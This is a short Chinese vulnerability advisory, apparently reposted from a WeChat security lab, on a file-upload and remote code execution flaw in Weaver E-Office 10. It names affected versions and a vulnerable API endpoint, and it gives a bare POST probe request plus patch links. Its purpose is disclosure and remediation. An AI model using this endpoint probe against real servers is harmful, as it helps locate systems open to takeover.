泛微E-Office 10任意文件上传漏洞

2024年3月14日13:20:19评论73 views字数 681阅读2分16秒阅读模式

0x00写在前面

本次测试仅供学习使用，如若非法他用，与平台和本文作者无关，需自行负责！

0x01漏洞介绍

Weaver E-Office是中国泛微科技（Weaver）公司的一个协同办公系统。泛微 E-Office 是一款标准化的协同 OA 办公软件，实行通用化产品设计，充分贴合企业管理需求，本着简洁易用、高效智能的原则，为企业快速打造移动化、无纸化、数字化的办公平台。

泛微E-Office 10在 10.0_20230821 版本之前存在远程代码执行漏洞，该漏洞是通过文件上传配合文件包含实现远程代码执行，攻击者可利用此漏洞上传恶意文件并控制服务器。

0x02影响版本

e-office 10.0_20230821 版本之前

0x03漏洞复现

1.访问漏洞环境

泛微E-Office 10任意文件上传漏洞

2.对漏洞进行复现

POC （POST）

POST /eoffice10/server/public/api/welink/welink-move HTTP/1.1Host: 127.0.0.1User-Agent: Go-http-client/1.1Content-Length: 0Accept-Encoding: gzip

泛微E-Office 10任意文件上传漏洞

3.Xpoc工具测试（漏洞存在）

泛微E-Office 10任意文件上传漏洞

0x04修复建议

目前厂商已发布升级补丁以修复漏洞，补丁获取链接：

安全版本:
泛微e-office10 >= 10.0_20230821

http://v10.e-office.cn/eoffice9update/20220525/webroot.ziphttps://www.weaver.com.cn/

原文始发于微信公众号（弥天安全实验室）：泛微E-Office 10任意文件上传漏洞

某单位网址未授权导致发生的视频信息泄露